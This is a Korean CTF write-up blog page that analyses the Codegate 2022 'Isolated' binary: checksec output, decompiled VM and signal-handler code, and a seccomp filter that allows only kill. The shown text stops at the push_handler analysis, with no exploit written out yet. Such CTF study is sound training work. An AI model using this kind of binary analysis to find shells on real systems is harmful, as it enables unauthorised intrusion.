<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 6.2.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css" integrity="sha256-DfWjNxDkM94fVBWx1H5BMMp0Zq7luBlV8QRcSES7s+0=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"juhyun167.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":true,"version":"8.12.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":false,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="개요  Simple VM, But isloated.  chall.zip 문제 분석 64비트 x86_64 바이너리 isolated 와 Dockerfile 등이 주어집니다. 바이너리는 심볼이 strip되어 있고, Canary, NX, PIE 보호 기법이 적용되어 있습니다. 1234567$ checksec isolated[*] &amp;#x27;&#x2F;home&#x2F;user&#x2F;st">
<meta property="og:type" content="article">
<meta property="og:title" content="[Codegate CTF 2022] Isolated">
<meta property="og:url" content="https://juhyun167.github.io/2022/07/06/codegate22-isolated/index.html">
<meta property="og:site_name" content="JUHYUN167">
<meta property="og:description" content="개요  Simple VM, But isloated.  chall.zip 문제 분석 64비트 x86_64 바이너리 isolated 와 Dockerfile 등이 주어집니다. 바이너리는 심볼이 strip되어 있고, Canary, NX, PIE 보호 기법이 적용되어 있습니다. 1234567$ checksec isolated[*] &amp;#x27;&#x2F;home&#x2F;user&#x2F;st">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://juhyun167.github.io/images/codegate22-isolated/1.png">
<meta property="og:image" content="https://juhyun167.github.io/images/codegate22-isolated/2.png">
<meta property="article:published_time" content="2022-07-06T23:25:37.000Z">
<meta property="article:modified_time" content="2022-08-05T05:21:57.582Z">
<meta property="article:author" content="juhyun167 블로그">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://juhyun167.github.io/images/codegate22-isolated/1.png">


<link rel="canonical" href="https://juhyun167.github.io/2022/07/06/codegate22-isolated/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://juhyun167.github.io/2022/07/06/codegate22-isolated/","path":"2022/07/06/codegate22-isolated/","title":"[Codegate CTF 2022] Isolated"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>[Codegate CTF 2022] Isolated | JUHYUN167</title>
  
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-2NL1HJ159T"></script>
  <script class="next-config" data-name="google_analytics" type="application/json">{"tracking_id":"G-2NL1HJ159T","only_pageview":false}</script>
  <script src="/js/third-party/analytics/google-analytics.js"></script>




<!-- custom fonts -->
<link rel="stylesheet" as="style" crossorigin href="https://cdn.jsdelivr.net/gh/orioncactus/pretendard/dist/web/static/pretendard-dynamic-subset.css" />
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Roboto+Mono:wght@400;700&display=swap" rel="stylesheet">

<!-- google search console -->
<meta name="google-site-verification" content="pV2zNbKpqSdeajzc7IIefYq62vg-J9PCZfCvLKwnYF8" />
<!-- naver search advisor -->
<meta name="naver-site-verification" content="e4b3b4646981d90b2cfdab4014543ed9338b4e57" />

  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/rss2.xml" title="JUHYUN167" type="application/rss+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
    </div>
  </div>

  <div class="site-meta">
      <img class="custom-logo-image" src="/images/custom-logo.png" alt="JUHYUN167">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">JUHYUN167</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">Elegant and powerful theme for Hexo</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>
<!-- load header custom script -->
<script src="/scripts/header.js"></script>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-overview-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">juhyun167 블로그</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">9</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">categories</span>
      </div>
  </nav>
</div>


<ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/Computer-Science/">Computer Science</a><span class="category-list-count">1</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/Computer-Science/Data-Structures/">Data Structures</a><span class="category-list-count">1</span></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/Security/">Security</a><span class="category-list-count">6</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/Security/CTF/">CTF</a><span class="category-list-count">4</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Security/Reverse-Engineering/">Reverse Engineering</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Security/System-Hacking/">System Hacking</a><span class="category-list-count">1</span></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/Thoughts/">Thoughts</a><span class="category-list-count">2</span></li></ul>

<!-- load sidebar custom script -->
<script src="/scripts/sidebar.js"></script>

        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://juhyun167.github.io/2022/07/06/codegate22-isolated/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="juhyun167 블로그">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="JUHYUN167">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="[Codegate CTF 2022] Isolated | JUHYUN167">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          [Codegate CTF 2022] Isolated
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2022-07-06 23:25:37" itemprop="dateCreated datePublished" datetime="2022-07-06T23:25:37+00:00">2022-07-06</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2022-08-05 05:21:57" itemprop="dateModified" datetime="2022-08-05T05:21:57+00:00">2022-08-05</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Security/" itemprop="url" rel="index"><span itemprop="name">Security</span></a>
        </span>
          , 
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Security/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h2 id="%EA%B0%9C%EC%9A%94" tabindex="-1">개요</h2>
<blockquote>
<p>Simple VM, But isloated.</p>
</blockquote>
<p><a href="/uploads/codegate22-isolated/chall.zip">chall.zip</a></p>
<h2 id="%EB%AC%B8%EC%A0%9C-%EB%B6%84%EC%84%9D" tabindex="-1">문제 분석</h2>
<p>64비트 x86_64 바이너리 <code>isolated</code> 와 <code>Dockerfile</code> 등이 주어집니다. 바이너리는 심볼이 strip되어 있고, Canary, NX, PIE 보호 기법이 적용되어 있습니다.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ checksec isolated</span><br><span class="line">[*] <span class="string">&#x27;/home/user/study/ctf/codegate22/isolated/isolated&#x27;</span></span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      PIE enabled</span><br></pre></td></tr></table></figure>
<p>바이너리를 실행하면 로고를 출력하고 opcode를 입력받습니다. 아무 문자열이나 입력했더니 <code>SIGKILL</code> 시그널을 받고 종료합니다. 로고의 'VM’이나, opcode를 입력받는다는 점에서 가상머신을 묘사한 바이너리임을 추측할 수 있습니다.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">./isolated</span><br><span class="line">   __   __        __       ___  ___  __</span><br><span class="line">| /__` /  \ |    /  \  /\   |  |__  |  \    __    \  /  |\/|</span><br><span class="line">| .__/ \__/ |___ \__/ /~~\  |  |___ |__/           \/   |  |</span><br><span class="line"></span><br><span class="line">opcodes &gt;aaaa</span><br><span class="line">[1]    1544809 killed     ./isolated</span><br></pre></td></tr></table></figure>
<p><code>main</code> 함수를 살펴보면 다음과 같습니다. 12행에서 <code>code</code> 를 768바이트 입력받고, 13행에서 <code>context</code> 구조체를 할당합니다. 14행에서 <code>fork</code> 시스템 콜을 호출하여 자식 프로세스는 <code>run</code> 함수를 호출하고, 부모 프로세스는 <code>set_signal_handlers</code> 프로세스를 호출하도록 합니다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">__int64 __fastcall <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span> ppid; <span class="comment">// edi</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span> len; <span class="comment">// [rsp+8h] [rbp-18h]</span></span><br><span class="line">  <span class="type">char</span> *code; <span class="comment">// [rsp+10h] [rbp-10h]</span></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> <span class="title">context</span> *<span class="title">context</span>;</span> <span class="comment">// [rsp+18h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  setup();</span><br><span class="line">  loading();</span><br><span class="line">  code = (<span class="type">char</span> *)<span class="built_in">malloc</span>(<span class="number">0x301</span>uLL);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;opcodes &gt;&quot;</span>);</span><br><span class="line">  len = read(<span class="number">0</span>, code, <span class="number">0x300</span>uLL);</span><br><span class="line">  context = (<span class="keyword">struct</span> context *)mmap(<span class="number">0LL</span>, <span class="number">8uLL</span>, <span class="number">3</span>, <span class="number">33</span>, <span class="number">-1</span>, <span class="number">0LL</span>);<span class="comment">// mmap(0, 8, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0)</span></span><br><span class="line">  <span class="keyword">if</span> ( !fork() )                                <span class="comment">// child process</span></span><br><span class="line">  &#123;</span><br><span class="line">    sleep(<span class="number">1u</span>);</span><br><span class="line">    alarm(<span class="number">8u</span>);</span><br><span class="line">    ppid = getppid();</span><br><span class="line">    run(ppid, code, len, context);</span><br><span class="line">  &#125;</span><br><span class="line">  alarm(<span class="number">8u</span>);</span><br><span class="line">  set_signal_handlers(context);                 <span class="comment">// parent process</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>context</code> 구조체는 가상머신의 상태를 나타내는 구조체입니다. 명령어의 실행 상태를 나타내는 열거형 변수 <code>state</code> 와 인자를 전달받고 결과를 대입하는 용도로 사용하는 정수형 변수 <code>reg</code> 를 멤버로 가지고 있습니다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">context</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  <span class="class"><span class="keyword">enum</span> <span class="title">state</span> <span class="title">state</span>;</span></span><br><span class="line">  u32 reg;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<p>열거형 <code>state</code> 는 다음과 같이 명령어가 실행 중임을 나타내는 <code>LOCKED</code> , 명령어 실행에 성공했음을 나타내는 <code>SUCCESS</code> , 실행 중 오류가 발생했음을 나타내는 <code>ERROR</code> 로 구분됩니다. <code>state</code> 의 사용은 이후 분석할 함수들에서 자세히 살펴볼 수 있습니다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">enum</span> <span class="title">state</span> :</span> <span class="type">unsigned</span> __int32</span><br><span class="line">&#123;</span><br><span class="line">  LOCKED = <span class="number">0x1</span>,</span><br><span class="line">  SUCCESS = <span class="number">0x2</span>,</span><br><span class="line">  ERROR = <span class="number">0x3</span>,</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<p>부모 프로세스에서 호출하는 <code>set_signal_handlers</code> 함수는 전역 변수 <code>g_context</code> 에 앞서 할당한 <code>context</code> 구조체를 대입합니다. 이후 각각의 시그널 번호에 해당하는 핸들러 함수를 등록하고 무한 루프에 진입합니다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> __fastcall __noreturn <span class="title function_">set_signal_handlers</span><span class="params">(<span class="keyword">struct</span> context *context)</span> <span class="comment">// 0x1766</span></span><br><span class="line">&#123;</span><br><span class="line">  g_context = context;</span><br><span class="line">  signal(<span class="number">1</span>, (<span class="type">__sighandler_t</span>)push_handler);</span><br><span class="line">  signal(<span class="number">2</span>, (<span class="type">__sighandler_t</span>)pop_handler);</span><br><span class="line">  signal(<span class="number">3</span>, (<span class="type">__sighandler_t</span>)clean_handler);</span><br><span class="line">  signal(<span class="number">4</span>, (<span class="type">__sighandler_t</span>)log_handler);</span><br><span class="line">  <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">    ;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>자식 프로세스에서 호출하는 <code>run</code> 함수는 <code>setup_seccomp</code> 함수를 호출하고 <code>send_locked</code> 함수를 통해 <code>CLEAN</code> 명령어를 실행한 후, 입력받은 opcode를 파싱하여 각각의 명령어를 실행합니다. 파싱한 opcode에 해당하는 명령어가 없으면 <code>send</code> 함수를 통해 부모 프로세스에 <code>SIGKILL</code> 시그널을 전송하여 종료합니다. 주석 처리하여 생략한 “opcode handlers” 부분이 가상머신이 명령어를 처리하는 부분으로, 이 부분은 가상머신의 전체 구조를 먼저 살펴본 후 분석하겠습니다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> __fastcall __noreturn <span class="title function_">run</span><span class="params">(<span class="type">unsigned</span> <span class="type">int</span> ppid, <span class="type">char</span> *code, <span class="type">unsigned</span> <span class="type">int</span> len, <span class="keyword">struct</span> context *context)</span>  <span class="comment">// 0xe2d</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  setup_seccomp(<span class="number">62</span>, <span class="number">0xC000003E</span>, <span class="number">1u</span>);</span><br><span class="line">  send_locked(ppid, context, CLEAN, <span class="number">0</span>);</span><br><span class="line">  pc = <span class="number">0</span>;</span><br><span class="line">  eflags = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">while</span> ( pc &lt; len )</span><br><span class="line">  &#123;</span><br><span class="line">    op = pc++;</span><br><span class="line">    <span class="keyword">switch</span> ( code[op] )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="comment">/* ... opcode handlers ... */</span></span><br><span class="line">      <span class="keyword">default</span>:</span><br><span class="line">        send(ppid, context, (<span class="keyword">enum</span> signal)<span class="number">9u</span>, <span class="number">0</span>);<span class="comment">// SIGKILL</span></span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  send(ppid, context, (<span class="keyword">enum</span> signal)<span class="number">9u</span>, <span class="number">0</span>);      <span class="comment">// SIGKILL</span></span><br><span class="line">  <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>setup_seccomp</code> 함수는 <code>prctl</code> 시스템 콜을 호출하여 다른 시스템 콜을 필터링하도록 하는데, seccomp-tools 도구를 사용하면 바이너리에 설정된 필터링 정책을 쉽게 분석할 수 있습니다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> __fastcall <span class="title function_">setup_seccomp</span><span class="params">(<span class="type">int</span> a1, <span class="type">int</span> a2, <span class="type">unsigned</span> __int16 a3)</span>  <span class="comment">// 0xc70</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="keyword">if</span> ( prctl(<span class="number">38</span>, <span class="number">1LL</span>, <span class="number">0LL</span>, <span class="number">0LL</span>, <span class="number">0LL</span>) )</span><br><span class="line">  &#123;</span><br><span class="line">    perror(<span class="string">&quot;prctl(NO_NEW_PRIVS)&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span> <span class="keyword">if</span> ( prctl(<span class="number">22</span>, <span class="number">2LL</span>, &amp;v3) )</span><br><span class="line">  &#123;</span><br><span class="line">    perror(<span class="string">&quot;prctl(PR_SET_SECCOMP)&quot;</span>);            <span class="comment">// prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER))</span></span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><div class="link-preview-widget"><a href="https://github.com/david942j/seccomp-tools" rel="noopener external nofollow noreferrer" target="_blank"><div class="link-preview-widget-title">GitHub - david942j/seccomp-tools: Provide powerful tools for seccomp analysis</div><div class="link-preview-widget-description">Provide powerful tools for seccomp analysis. Contribute to david942j/seccomp-tools development by creating an account on GitHub.</div><div class="link-preview-widget-url">GitHub</div></a><a class="link-preview-widget-image" href="https://github.com/david942j/seccomp-tools" rel="noopener external nofollow noreferrer" style="background-image: url('https://opengraph.githubassets.com/11b8fc49bbe8f3c00feb26e49735ed99bfedf39265c4c3e2d8f8f3bade17e381/david942j/seccomp-tools');" target="_blank"></a></div></p>
<p>다음과 같이 seccomp-tools 를 실행한 결과, <code>kill</code> 시스템 콜이 아니면 모두 필터링함을 알 수 있습니다. 따라서 자식 프로세스를 <code>execve</code> 등의 시스템 콜을 사용하여 익스플로잇하는 것은 불가능하며, 부모 프로세스를 익스플로잇하여 셸을 획득해야 함을 추측할 수 있습니다.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">$ seccomp-tools dump ./isolated</span><br><span class="line"><span class="comment"># ...</span></span><br><span class="line"> line  CODE  JT   JF      K</span><br><span class="line">=================================</span><br><span class="line"> 0000: 0x20 0x00 0x00 0x00000004  A = <span class="built_in">arch</span></span><br><span class="line"> 0001: 0x15 0x00 0x03 0xc000003e  <span class="keyword">if</span> (A != ARCH_X86_64) goto 0005</span><br><span class="line"> 0002: 0x20 0x00 0x00 0x00000000  A = sys_number</span><br><span class="line"> 0003: 0x15 0x00 0x01 0x0000003e  <span class="keyword">if</span> (A != <span class="built_in">kill</span>) goto 0005</span><br><span class="line"> 0004: 0x06 0x00 0x00 0x7fff0000  <span class="built_in">return</span> ALLOW</span><br><span class="line"> 0005: 0x06 0x00 0x00 0x00000001  <span class="built_in">return</span> KILL</span><br></pre></td></tr></table></figure>
<p><code>run</code> 함수는 명령어 실행 및 <code>SIGKILL</code> 시그널 전송 등에 <code>send_locked</code> 와 <code>send</code> 두 가지 함수를 동시에 사용하고 있습니다. 먼저 <code>send</code> 함수를 살펴보면 <code>context-&gt;state</code> 를 <code>LOCKED</code> 로 설정하고, 인자 <code>arg</code> 를 <code>context-&gt;reg</code> 에 대입한 후 <code>kill</code> 시스템 콜을 호출하여 부모 프로세스에 시그널을 전송합니다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> __fastcall <span class="title function_">send</span><span class="params">(<span class="type">__pid_t</span> ppid, <span class="keyword">struct</span> context *context, <span class="keyword">enum</span> signal signum, <span class="type">int</span> arg)</span>  <span class="comment">// 0xda4</span></span><br><span class="line">&#123;</span><br><span class="line">  context-&gt;state = LOCKED;</span><br><span class="line">  context-&gt;reg = arg;</span><br><span class="line">  kill(ppid, signum);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>이 때 <code>signum</code> 에 해당하는 시그널 번호는 다음과 같이 <code>signal</code> 열거형 중 하나 또는 9 (<code>SIGKILL</code>)로, <code>PUSH</code> , <code>POP</code> , <code>CLEAN</code> , <code>LOG</code> 가 각각의 명령어에 해당합니다. 따라서 바이너리가 묘사하는 가상머신은 자식 프로세스가 명령어와 인자를 시그널로 전송하면, 부모 프로세스에서 해당하는 핸들러 함수를 호출하여 처리하는 구조임을 알 수 있습니다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">enum</span> <span class="title">signal</span> :</span> <span class="type">unsigned</span> __int32</span><br><span class="line">&#123;</span><br><span class="line">  PUSH = <span class="number">0x1</span>,</span><br><span class="line">  POP = <span class="number">0x2</span>,</span><br><span class="line">  CLEAN = <span class="number">0x3</span>,</span><br><span class="line">  LOG = <span class="number">0x4</span>,</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<p>다음으로 <code>send_blocked</code> 함수는 동일하게 <code>send</code> 함수를 호출하여 시그널을 전송한 이후, <code>context-&gt;state</code> 가 <code>LOCKED</code> 인 동안 루프에 진입하는 busy waiting을 수행합니다. 이후 분석할 부모 프로세스의 핸들러 함수들은 모두 명령어 실행 루틴 이후 <code>context-&gt;state</code> 를 <code>SUCCESS</code> 또는 <code>ERROR</code> 로 설정합니다. <code>send</code> 함수가 <code>context-&gt;state</code> 를 <code>LOCKED</code> 로 설정한 이상 핸들러 함수가 루틴을 종료할 때까지 <code>send_blocked</code> 함수는 무한 대기하므로, 이 함수는 명령어를 일종의 블로킹(blocking) 방식으로 실행하도록 한다고 생각할 수 있겠습니다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> __fastcall <span class="title function_">send_locked</span><span class="params">(<span class="type">unsigned</span> <span class="type">int</span> ppid, <span class="keyword">struct</span> context *context, <span class="keyword">enum</span> signal signum, <span class="type">unsigned</span> <span class="type">int</span> arg)</span>   <span class="comment">// 0xddf</span></span><br><span class="line">&#123;</span><br><span class="line">  send(ppid, context, signum, arg);</span><br><span class="line">  <span class="keyword">while</span> ( context-&gt;state == LOCKED )            <span class="comment">// busy waiting while being processed</span></span><br><span class="line">    ;</span><br><span class="line">  <span class="keyword">if</span> ( context-&gt;state == ERROR )</span><br><span class="line">    context-&gt;reg = <span class="number">-1</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>이번에는 부모 프로세스에서 각각의 명령어를 처리하는 핸들러 함수를 살펴보겠습니다. 모든 핸들러 함수에서 공통적으로 사용하는 전역 변수는 다음과 같습니다.</p>
<ol>
<li><code>stack</code> - 정수형 전역 배열로, 원소 1543개 크기입니다.</li>
<li><code>g_stack_idx</code> - 스택 포인터의 역할을 하는 정수형 전역 변수로, 이 변수의 값을 인덱스로 <code>stack</code> 에 접근합니다.</li>
<li><code>log_enabled</code> - 전역 변수로, 값이 0이 아닌 경우 핸들러 함수가 로그를 출력합니다.</li>
</ol>
<p><code>push_handler</code> 함수는 <code>g_stack_idx</code> 가 767보다 작거나 같은 경우 1을 증가시키고, <code>stack[g_stack_idx]</code> 에 인자로 전달된 <code>g_context-&gt;reg</code> 를 대입합니다.</p>
